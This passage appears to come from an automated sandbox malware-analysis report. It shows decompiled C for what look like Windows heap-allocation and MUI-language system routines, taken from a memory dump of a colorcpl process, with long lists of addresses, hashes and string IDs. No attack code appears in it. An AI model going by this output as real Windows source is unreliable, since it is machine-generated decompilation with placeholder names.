                                                                                                						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                                                                                						_t246 = _t506 >> 4;
                                                                                                						if(_t551 < _t506 - _t246) {
                                                                                                							_t508 =  *(_t553 + 0x23c);
                                                                                                							_t246 = _t508 >> 2;
                                                                                                							__eflags = _t551 - _t508 - _t246;
                                                                                                							if(_t551 > _t508 - _t246) {
                                                                                                								_t246 = E06E4ABD8(_t553);
                                                                                                								 *(_t553 + 0x23c) = _t551;
                                                                                                								 *(_t553 + 0x238) = _t551;
                                                                                                							}
                                                                                                						}
                                                                                                						goto L7;
                                                                                                					}
                                                                                                				}
                                                                                                			}



















































































                                                                                                0x00000000
                                                                                                0x06e3a7bc
                                                                                                0x06e82066
                                                                                                0x06e82068
                                                                                                0x06e82073
                                                                                                0x06e82073
                                                                                                0x06e82073
                                                                                                0x06e82078
                                                                                                0x06e82079
                                                                                                0x06e8207d
                                                                                                0x00000000
                                                                                                0x06e8207d
                                                                                                0x06e3a7b6
                                                                                                0x06e3a440
                                                                                                0x06e3a440
                                                                                                0x06e3a440
                                                                                                0x06e3a446
                                                                                                0x06e3a44c
                                                                                                0x06e3a44f
                                                                                                0x06e3a453
                                                                                                0x06e3a455
                                                                                                0x06e820b3
                                                                                                0x06e820b9
                                                                                                0x06e820b9
                                                                                                0x06e3a45d
                                                                                                0x06e3a460
                                                                                                0x06e3a464
                                                                                                0x06e3a466
                                                                                                0x06e3a46b
                                                                                                0x06e3a46f
                                                                                                0x06e3a471
                                                                                                0x06e3a471
                                                                                                0x06e3a471
                                                                                                0x06e3a474
                                                                                                0x06e3a479
                                                                                                0x06e3a47d
                                                                                                0x06e3a47f
                                                                                                0x06e82229
                                                                                                0x06e8222f
                                                                                                0x06e3a3c8
                                                                                                0x06e3a3c8
                                                                                                0x06e3a3ca
                                                                                                0x06e3a3ca
                                                                                                0x00000000
                                                                                                0x06e3a3ca
                                                                                                0x06e82235
                                                                                                0x06e8223a
                                                                                                0x06e8223a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82240
                                                                                                0x06e82246
                                                                                                0x06e8224a
                                                                                                0x06e82269
                                                                                                0x06e8226e
                                                                                                0x06e8224c
                                                                                                0x06e82261
                                                                                                0x06e82266
                                                                                                0x06e82274
                                                                                                0x06e82279
                                                                                                0x06e8227e
                                                                                                0x06e82286
                                                                                                0x06e82288
                                                                                                0x06e8228d
                                                                                                0x06e8228d
                                                                                                0x06e82292
                                                                                                0x06e82292
                                                                                                0x06e82295
                                                                                                0x06e82295
                                                                                                0x00000000
                                                                                                0x06e82295
                                                                                                0x06e3a485
                                                                                                0x06e3a489
                                                                                                0x06e3a48b
                                                                                                0x06e3a48f
                                                                                                0x06e3a493
                                                                                                0x06e3a497
                                                                                                0x06e3a49b
                                                                                                0x06e3a4bb
                                                                                                0x06e3a4bb
                                                                                                0x06e3a4bd
                                                                                                0x06e3a4ff
                                                                                                0x06e3a4ff
                                                                                                0x06e3a501
                                                                                                0x06e3a505
                                                                                                0x06e3a50f
                                                                                                0x06e3a517
                                                                                                0x06e3a51b
                                                                                                0x06e3a527
                                                                                                0x06e3a52b
                                                                                                0x06e82182
                                                                                                0x06e82185
                                                                                                0x06e82193
                                                                                                0x06e82199
                                                                                                0x06e82199
                                                                                                0x06e3a531
                                                                                                0x06e3a535
                                                                                                0x06e3a538
                                                                                                0x06e3a548
                                                                                                0x06e3a54b
                                                                                                0x06e3a54d
                                                                                                0x06e3a553
                                                                                                0x06e3a559
                                                                                                0x06e82100
                                                                                                0x06e82103
                                                                                                0x06e82109
                                                                                                0x06e8210f
                                                                                                0x06e82112
                                                                                                0x06e82131
                                                                                                0x06e82136
                                                                                                0x06e82114
                                                                                                0x06e82129
                                                                                                0x06e8212e
                                                                                                0x06e8213c
                                                                                                0x06e82141
                                                                                                0x06e82147
                                                                                                0x06e8214d
                                                                                                0x06e82151
                                                                                                0x06e82154
                                                                                                0x06e82154
                                                                                                0x06e82159
                                                                                                0x06e82159
                                                                                                0x06e82103
                                                                                                0x06e3a55f
                                                                                                0x06e3a562
                                                                                                0x06e3a565
                                                                                                0x06e3a567
                                                                                                0x06e82162
                                                                                                0x06e3a56d
                                                                                                0x06e3a574
                                                                                                0x06e3a575
                                                                                                0x06e3a579
                                                                                                0x06e3a57e
                                                                                                0x06e82169
                                                                                                0x06e8216a
                                                                                                0x06e82170
                                                                                                0x06e82175
                                                                                                0x06e82179
                                                                                                0x06e82179
                                                                                                0x06e3a57e
                                                                                                0x06e3a584
                                                                                                0x06e3a58f
                                                                                                0x06e3a58f
                                                                                                0x06e3a52b
                                                                                                0x06e3a5ad
                                                                                                0x06e3a5bc
                                                                                                0x06e3a5c1
                                                                                                0x06e3a5c6
                                                                                                0x06e3a5cb
                                                                                                0x06e3a5cd
                                                                                                0x06e821a9
                                                                                                0x06e3a5d3
                                                                                                0x06e3a5d3
                                                                                                0x06e3a5d3
                                                                                                0x06e3a5d5
                                                                                                0x06e3a5d8
                                                                                                0x06e821b3
                                                                                                0x06e821bc
                                                                                                0x06e821c2
                                                                                                0x06e821cd
                                                                                                0x06e821cf
                                                                                                0x06e821da
                                                                                                0x06e821da
                                                                                                0x06e821da
                                                                                                0x06e821f7
                                                                                                0x06e821f7
                                                                                                0x06e821c2
                                                                                                0x06e3a5de
                                                                                                0x06e3a5e3
                                                                                                0x06e3a5e8
                                                                                                0x06e3a5ea
                                                                                                0x06e8220a
                                                                                                0x06e3a5f0
                                                                                                0x06e3a5f0
                                                                                                0x06e3a5f0
                                                                                                0x06e3a5f2
                                                                                                0x06e3a5f5
                                                                                                0x06e82219
                                                                                                0x06e8221b
                                                                                                0x06e8208c
                                                                                                0x06e8208c
                                                                                                0x06e8208c
                                                                                                0x06e82095
                                                                                                0x06e82096
                                                                                                0x06e82097
                                                                                                0x06e82098
                                                                                                0x06e820a4
                                                                                                0x06e820a5
                                                                                                0x06e820a9
                                                                                                0x06e820a9
                                                                                                0x00000000
                                                                                                0x06e3a5f5
                                                                                                0x06e3a4bf
                                                                                                0x06e3a4d3
                                                                                                0x06e3a4d8
                                                                                                0x06e3a4da
                                                                                                0x06e81ede
                                                                                                0x06e81ede
                                                                                                0x06e81ee4
                                                                                                0x06e81ee9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e81f07
                                                                                                0x00000000
                                                                                                0x06e81f07
                                                                                                0x06e3a4e0
                                                                                                0x06e3a4e5
                                                                                                0x06e3a4e7
                                                                                                0x06e820cb
                                                                                                0x06e3a4ed
                                                                                                0x06e3a4ed
                                                                                                0x06e3a4ed
                                                                                                0x06e3a4f2
                                                                                                0x06e3a4f5
                                                                                                0x06e820d5
                                                                                                0x06e820de
                                                                                                0x06e820e4
                                                                                                0x06e820f6
                                                                                                0x06e820f6
                                                                                                0x06e820e4
                                                                                                0x06e3a4fb
                                                                                                0x00000000
                                                                                                0x06e3a4fb
                                                                                                0x06e3a4a1
                                                                                                0x06e3a4a4
                                                                                                0x06e3a4a8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a4aa
                                                                                                0x06e3a4ac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a4b2
                                                                                                0x06e3a4b5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3a4b5
                                                                                                0x06e3a43a
                                                                                                0x06e3a340
                                                                                                0x06e3a346
                                                                                                0x06e3a600
                                                                                                0x00000000
                                                                                                0x06e3a600
                                                                                                0x06e3a34f
                                                                                                0x06e3a351
                                                                                                0x06e3a358
                                                                                                0x06e3a3c6
                                                                                                0x00000000
                                                                                                0x06e3a371
                                                                                                0x06e3a37a
                                                                                                0x06e3a37f
                                                                                                0x06e3a382
                                                                                                0x06e3a384
                                                                                                0x06e3a394
                                                                                                0x00000000
                                                                                                0x06e3a396
                                                                                                0x06e3a399
                                                                                                0x06e3a3a7
                                                                                                0x06e3a3b0
                                                                                                0x06e3a3b4
                                                                                                0x06e3a3bb
                                                                                                0x06e3a3d2
                                                                                                0x06e3a3da
                                                                                                0x06e3a3df
                                                                                                0x06e3a3e1
                                                                                                0x06e3a3e5
                                                                                                0x06e3a3ea
                                                                                                0x06e3a3f0
                                                                                                0x06e3a3f0
                                                                                                0x06e3a3e1
                                                                                                0x00000000
                                                                                                0x06e3a3bb
                                                                                                0x06e3a394

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-523794902
                                                                                                • Opcode ID: daf1b8b6a35901073fa488b7646bf63e3f7600bf7413779434e88ce1c3fb7d45
                                                                                                • Instruction ID: 85efec34919ee8aec9f4a4dcaa379a5e05abef3f8719fdc3d80672248c1dc144
                                                                                                • Opcode Fuzzy Hash: daf1b8b6a35901073fa488b7646bf63e3f7600bf7413779434e88ce1c3fb7d45
                                                                                                • Instruction Fuzzy Hash: 764212306143819FD795DF28C888B6AB7E5FF88308F04696DE49A8B351D734D986CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 64%
                                                                                                			E06ED2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t83;
                                                                                                				signed char _t89;
                                                                                                				intOrPtr _t90;
                                                                                                				signed char _t101;
                                                                                                				signed int _t102;
                                                                                                				intOrPtr _t104;
                                                                                                				signed int _t105;
                                                                                                				signed int _t106;
                                                                                                				intOrPtr _t108;
                                                                                                				intOrPtr _t112;
                                                                                                				short* _t130;
                                                                                                				short _t131;
                                                                                                				signed int _t148;
                                                                                                				intOrPtr _t149;
                                                                                                				signed int* _t154;
                                                                                                				short* _t165;
                                                                                                				signed int _t171;
                                                                                                				void* _t182;
                                                                                                
                                                                                                				_push(0x44);
                                                                                                				_push(0x6ef0e80);
                                                                                                				E06E6D0E8(__ebx, __edi, __esi);
                                                                                                				_t177 = __edx;
                                                                                                				_t181 = __ecx;
                                                                                                				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                                                                                				 *((char*)(_t182 - 0x1d)) = 0;
                                                                                                				 *(_t182 - 0x24) = 0;
                                                                                                				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                                                					 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                                                					 *((intOrPtr*)(_t182 - 4)) = 1;
                                                                                                					_t83 = E06E140E1("RtlAllocateHeap");
                                                                                                					__eflags = _t83;
                                                                                                					if(_t83 == 0) {
                                                                                                						L48:
                                                                                                						 *(_t182 - 0x24) = 0;
                                                                                                						L49:
                                                                                                						 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                                                						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                                                                                						E06ED30C4();
                                                                                                						goto L50;
                                                                                                					}
                                                                                                					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                                                                                					 *(_t182 - 0x28) = _t89;
                                                                                                					 *(_t182 - 0x3c) = _t89;
                                                                                                					_t177 =  *(_t182 + 8);
                                                                                                					__eflags = _t177;
                                                                                                					if(_t177 == 0) {
                                                                                                						_t171 = 1;
                                                                                                						__eflags = 1;
                                                                                                					} else {
                                                                                                						_t171 = _t177;
                                                                                                					}
                                                                                                					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                                                                                					__eflags = _t148 - 0x10;
                                                                                                					if(_t148 < 0x10) {
                                                                                                						_t148 = 0x10;
                                                                                                					}
                                                                                                					_t149 = _t148 + 8;
                                                                                                					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                                                                                					__eflags = _t149 - _t177;
                                                                                                					if(_t149 < _t177) {
                                                                                                						L44:
                                                                                                						_t90 =  *[fs:0x30];
                                                                                                						__eflags =  *(_t90 + 0xc);
                                                                                                						if( *(_t90 + 0xc) == 0) {
                                                                                                							_push("HEAP: ");
                                                                                                							E06E1B150();
                                                                                                						} else {
                                                                                                							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                						}
                                                                                                						_push( *((intOrPtr*)(_t181 + 0x78)));
                                                                                                						E06E1B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                                                                                						goto L48;
                                                                                                					} else {
                                                                                                						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                                                                                						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                                                                                							goto L44;
                                                                                                						}
                                                                                                						__eflags = _t89 & 0x00000001;
                                                                                                						if((_t89 & 0x00000001) != 0) {
                                                                                                							_t178 =  *(_t182 - 0x28);
                                                                                                						} else {
                                                                                                							E06E2EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                                                                                							 *((char*)(_t182 - 0x1d)) = 1;
                                                                                                							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                                                                                							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                                                                                						}
                                                                                                						E06ED4496(_t181, 0);
                                                                                                						_t177 = L06E34620(_t181, _t181, _t178,  *(_t182 + 8));
                                                                                                						 *(_t182 - 0x24) = _t177;
                                                                                                						_t173 = 1;
                                                                                                						E06ED49A4(_t181);
                                                                                                						__eflags = _t177;
                                                                                                						if(_t177 == 0) {
                                                                                                							goto L49;
                                                                                                						} else {
                                                                                                							_t177 = _t177 + 0xfffffff8;
                                                                                                							__eflags =  *((char*)(_t177 + 7)) - 5;
                                                                                                							if( *((char*)(_t177 + 7)) == 5) {
                                                                                                								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                                                                                								__eflags = _t177;
                                                                                                							}
                                                                                                							_t154 = _t177;
                                                                                                							 *(_t182 - 0x40) = _t177;
                                                                                                							__eflags =  *(_t181 + 0x4c);
                                                                                                							if( *(_t181 + 0x4c) != 0) {
                                                                                                								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                                                								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                                                                                								if(__eflags != 0) {
                                                                                                									_push(_t154);
                                                                                                									_t173 = _t177;
                                                                                                									E06ECFA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                                                                                								}
                                                                                                							}
                                                                                                							__eflags =  *(_t177 + 2) & 0x00000002;
                                                                                                							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                                                                                								_t101 =  *(_t177 + 3);
                                                                                                								 *(_t182 - 0x29) = _t101;
                                                                                                								_t102 = _t101 & 0x000000ff;
                                                                                                							} else {
                                                                                                								_t130 = E06E11F5B(_t177);
                                                                                                								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                                                                                								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                                                                                								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                                                                                									 *_t130 = 0;
                                                                                                								} else {
                                                                                                									_t131 = E06E416C7(1, _t173);
                                                                                                									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                                                                                									 *_t165 = _t131;
                                                                                                									_t130 = _t165;
                                                                                                								}
                                                                                                								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                                                                                							}
                                                                                                							 *(_t182 - 0x34) = _t102;
                                                                                                							 *(_t182 - 0x28) = _t102;
                                                                                                							__eflags =  *(_t181 + 0x4c);
                                                                                                							if( *(_t181 + 0x4c) != 0) {
                                                                                                								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                                                                                								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                                                								__eflags =  *_t177;
                                                                                                							}
                                                                                                							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                                                                                							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                                                                                								__eflags = 0;
                                                                                                								E06ED4496(_t181, 0);
                                                                                                							}
                                                                                                							__eflags =  *(_t182 - 0x24) -  *0x6f06360; // 0x0
                                                                                                							_t104 =  *[fs:0x30];
                                                                                                							if(__eflags != 0) {
                                                                                                								_t105 =  *(_t104 + 0x68);
                                                                                                								 *(_t182 - 0x4c) = _t105;
                                                                                                								__eflags = _t105 & 0x00000800;
                                                                                                								if((_t105 & 0x00000800) == 0) {
                                                                                                									goto L49;
                                                                                                								}
                                                                                                								_t106 =  *(_t182 - 0x34);
                                                                                                								__eflags = _t106;
                                                                                                								if(_t106 == 0) {
                                                                                                									goto L49;
                                                                                                								}
                                                                                                								__eflags = _t106 -  *0x6f06364; // 0x0
                                                                                                								if(__eflags != 0) {
                                                                                                									goto L49;
                                                                                                								}
                                                                                                								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x6f06366; // 0x0
                                                                                                								if(__eflags != 0) {
                                                                                                									goto L49;
                                                                                                								}
                                                                                                								_t108 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t108 + 0xc);
                                                                                                								if( *(_t108 + 0xc) == 0) {
                                                                                                									_push("HEAP: ");
                                                                                                									E06E1B150();
                                                                                                								} else {
                                                                                                									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                								}
                                                                                                								_push(E06EBD455(_t181,  *(_t182 - 0x28)));
                                                                                                								_push( *(_t182 + 8));
                                                                                                								E06E1B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                                                                                								goto L34;
                                                                                                							} else {
                                                                                                								__eflags =  *(_t104 + 0xc);
                                                                                                								if( *(_t104 + 0xc) == 0) {
                                                                                                									_push("HEAP: ");
                                                                                                									E06E1B150();
                                                                                                								} else {
                                                                                                									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                								}
                                                                                                								_push( *(_t182 + 8));
                                                                                                								E06E1B150("Just allocated block at %p for %Ix bytes\n",  *0x6f06360);
                                                                                                								L34:
                                                                                                								_t112 =  *[fs:0x30];
                                                                                                								__eflags =  *((char*)(_t112 + 2));
                                                                                                								if( *((char*)(_t112 + 2)) != 0) {
                                                                                                									 *0x6f06378 = 1;
                                                                                                									 *0x6f060c0 = 0;
                                                                                                									asm("int3");
                                                                                                									 *0x6f06378 = 0;
                                                                                                								}
                                                                                                								goto L49;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t181 =  *0x6f05708; // 0x0
                                                                                                					 *0x6f0b1e0(__ecx, __edx,  *(_t182 + 8));
                                                                                                					 *_t181();
                                                                                                					L50:
                                                                                                					return E06E6D130(0, _t177, _t181);
                                                                                                				}
                                                                                                			}





















                                                                                                0x06ed3047
                                                                                                0x06ed304c
                                                                                                0x06ed305a
                                                                                                0x06ed3063
                                                                                                0x00000000
                                                                                                0x06ed2e20
                                                                                                0x06ed2e20
                                                                                                0x06ed2e23
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2e29
                                                                                                0x06ed2e2b
                                                                                                0x06ed2e47
                                                                                                0x06ed2e2d
                                                                                                0x06ed2e33
                                                                                                0x06ed2e38
                                                                                                0x06ed2e3f
                                                                                                0x06ed2e42
                                                                                                0x06ed2e42
                                                                                                0x06ed2e4e
                                                                                                0x06ed2e5d
                                                                                                0x06ed2e5f
                                                                                                0x06ed2e62
                                                                                                0x06ed2e66
                                                                                                0x06ed2e6b
                                                                                                0x06ed2e6d
                                                                                                0x00000000
                                                                                                0x06ed2e73
                                                                                                0x06ed2e73
                                                                                                0x06ed2e76
                                                                                                0x06ed2e7a
                                                                                                0x06ed2e83
                                                                                                0x06ed2e83
                                                                                                0x06ed2e83
                                                                                                0x06ed2e85
                                                                                                0x06ed2e87
                                                                                                0x06ed2e8a
                                                                                                0x06ed2e8d
                                                                                                0x06ed2e92
                                                                                                0x06ed2e9c
                                                                                                0x06ed2e9f
                                                                                                0x06ed2ea1
                                                                                                0x06ed2ea2
                                                                                                0x06ed2ea6
                                                                                                0x06ed2ea6
                                                                                                0x06ed2e9f
                                                                                                0x06ed2eab
                                                                                                0x06ed2eaf
                                                                                                0x06ed2edf
                                                                                                0x06ed2ee2
                                                                                                0x06ed2ee5
                                                                                                0x06ed2eb1
                                                                                                0x06ed2eb3
                                                                                                0x06ed2eb8
                                                                                                0x06ed2ebd
                                                                                                0x06ed2ec4
                                                                                                0x06ed2ed6
                                                                                                0x06ed2ec6
                                                                                                0x06ed2ec7
                                                                                                0x06ed2ecc
                                                                                                0x06ed2ecf
                                                                                                0x06ed2ed2
                                                                                                0x06ed2ed2
                                                                                                0x06ed2ed9
                                                                                                0x06ed2ed9
                                                                                                0x06ed2ee8
                                                                                                0x06ed2eeb
                                                                                                0x06ed2eef
                                                                                                0x06ed2ef2
                                                                                                0x06ed2efe
                                                                                                0x06ed2f04
                                                                                                0x06ed2f04
                                                                                                0x06ed2f04
                                                                                                0x06ed2f06
                                                                                                0x06ed2f0d
                                                                                                0x06ed2f0f
                                                                                                0x06ed2f13
                                                                                                0x06ed2f13
                                                                                                0x06ed2f1b
                                                                                                0x06ed2f21
                                                                                                0x06ed2f27
                                                                                                0x06ed2f95
                                                                                                0x06ed2f98
                                                                                                0x06ed2f9b
                                                                                                0x06ed2fa0
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2fa6
                                                                                                0x06ed2fa9
                                                                                                0x06ed2fac
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2fb2
                                                                                                0x06ed2fb9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2fc3
                                                                                                0x06ed2fca
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed2fd0
                                                                                                0x06ed2fd6
                                                                                                0x06ed2fd9
                                                                                                0x06ed2ff8
                                                                                                0x06ed2ffd
                                                                                                0x06ed2fdb
                                                                                                0x06ed2ff0
                                                                                                0x06ed2ff5
                                                                                                0x06ed300e
                                                                                                0x06ed300f
                                                                                                0x06ed301a
                                                                                                0x00000000
                                                                                                0x06ed2f29
                                                                                                0x06ed2f29
                                                                                                0x06ed2f2c
                                                                                                0x06ed2f4b
                                                                                                0x06ed2f50
                                                                                                0x06ed2f2e
                                                                                                0x06ed2f43
                                                                                                0x06ed2f48
                                                                                                0x06ed2f56
                                                                                                0x06ed2f64
                                                                                                0x06ed2f6c
                                                                                                0x06ed2f6c
                                                                                                0x06ed2f72
                                                                                                0x06ed2f76
                                                                                                0x06ed2f7c
                                                                                                0x06ed2f83
                                                                                                0x06ed2f89
                                                                                                0x06ed2f8a
                                                                                                0x06ed2f8a
                                                                                                0x00000000
                                                                                                0x06ed2f76
                                                                                                0x06ed2f27
                                                                                                0x06ed2e6d
                                                                                                0x06ed2da6
                                                                                                0x06ed2dab
                                                                                                0x06ed2db3
                                                                                                0x06ed2db9
                                                                                                0x06ed30bc
                                                                                                0x06ed30c1
                                                                                                0x06ed30c1

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                • API String ID: 0-1745908468
                                                                                                • Opcode ID: 9337d711e61c8b13e72fa7d5f09f9d8be2d5fb22d2c39a11737d10ab712604ae
                                                                                                • Instruction ID: d2fbb16e7aac7242c47af7ff98cde036d2f9730573b4158f55ab69e6561aff69
                                                                                                • Opcode Fuzzy Hash: 9337d711e61c8b13e72fa7d5f09f9d8be2d5fb22d2c39a11737d10ab712604ae
                                                                                                • Instruction Fuzzy Hash: 0E912531A10784DFDBE2DF68C840AADBBF2FF4A714F18A018E6559B391D7329946CB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 96%
                                                                                                			E06E23D34(signed int* __ecx) {
                                                                                                				signed int* _v8;
                                                                                                				char _v12;
                                                                                                				signed int* _v16;
                                                                                                				signed int* _v20;
                                                                                                				char _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _v32;
                                                                                                				char _v36;
                                                                                                				signed int _v40;
                                                                                                				signed int _v44;
                                                                                                				signed int* _v48;
                                                                                                				signed int* _v52;
                                                                                                				signed int _v56;
                                                                                                				signed int _v60;
                                                                                                				char _v68;
                                                                                                				signed int _t140;
                                                                                                				signed int _t161;
                                                                                                				signed int* _t236;
                                                                                                				signed int* _t242;
                                                                                                				signed int* _t243;
                                                                                                				signed int* _t244;
                                                                                                				signed int* _t245;
                                                                                                				signed int _t255;
                                                                                                				void* _t257;
                                                                                                				signed int _t260;
                                                                                                				void* _t262;
                                                                                                				signed int _t264;
                                                                                                				void* _t267;
                                                                                                				signed int _t275;
                                                                                                				signed int* _t276;
                                                                                                				short* _t277;
                                                                                                				signed int* _t278;
                                                                                                				signed int* _t279;
                                                                                                				signed int* _t280;
                                                                                                				short* _t281;
                                                                                                				signed int* _t282;
                                                                                                				short* _t283;
                                                                                                				signed int* _t284;
                                                                                                				void* _t285;
                                                                                                
                                                                                                				_v60 = _v60 | 0xffffffff;
                                                                                                				_t280 = 0;
                                                                                                				_t242 = __ecx;
                                                                                                				_v52 = __ecx;
                                                                                                				_v8 = 0;
                                                                                                				_v20 = 0;
                                                                                                				_v40 = 0;
                                                                                                				_v28 = 0;
                                                                                                				_v32 = 0;
                                                                                                				_v44 = 0;
                                                                                                				_v56 = 0;
                                                                                                				_t275 = 0;
                                                                                                				_v16 = 0;
                                                                                                				if(__ecx == 0) {
                                                                                                					_t280 = 0xc000000d;
                                                                                                					_t140 = 0;
                                                                                                					L50:
                                                                                                					 *_t242 =  *_t242 | 0x00000800;
                                                                                                					_t242[0x13] = _t140;
                                                                                                					_t242[0x16] = _v40;
                                                                                                					_t242[0x18] = _v28;
                                                                                                					_t242[0x14] = _v32;
                                                                                                					_t242[0x17] = _t275;
                                                                                                					_t242[0x15] = _v44;
                                                                                                					_t242[0x11] = _v56;
                                                                                                					_t242[0x12] = _v60;
                                                                                                					return _t280;
                                                                                                				}
                                                                                                				if(E06E21B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                					_v56 = 1;
                                                                                                					if(_v8 != 0) {
                                                                                                						L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                                					}
                                                                                                					_v8 = _t280;
                                                                                                				}
                                                                                                				if(E06E21B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                					_v60 =  *_v8;
                                                                                                					L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                                					_v8 = _t280;
                                                                                                				}
                                                                                                				if(E06E21B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                					L16:
                                                                                                					if(E06E21B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                						L28:
                                                                                                						if(E06E21B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                							L46:
                                                                                                							_t275 = _v16;
                                                                                                							L47:
                                                                                                							_t161 = 0;
                                                                                                							L48:
                                                                                                							if(_v8 != 0) {
                                                                                                								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                                							}
                                                                                                							_t140 = _v20;
                                                                                                							if(_t140 != 0) {
                                                                                                								if(_t275 != 0) {
                                                                                                									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                                									_t275 = 0;
                                                                                                									_v28 = 0;
                                                                                                									_t140 = _v20;
                                                                                                								}
                                                                                                							}
                                                                                                							goto L50;
                                                                                                						}
                                                                                                						_t167 = _v12;
                                                                                                						_t255 = _v12 + 4;
                                                                                                						_v44 = _t255;
                                                                                                						if(_t255 == 0) {
                                                                                                							_t276 = _t280;
                                                                                                							_v32 = _t280;
                                                                                                						} else {
                                                                                                							_t276 = L06E34620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                                							_t167 = _v12;
                                                                                                							_v32 = _t276;
                                                                                                						}
                                                                                                						if(_t276 == 0) {
                                                                                                							_v44 = _t280;
                                                                                                							_t280 = 0xc0000017;
                                                                                                							goto L46;
                                                                                                						} else {
                                                                                                							E06E5F3E0(_t276, _v8, _t167);
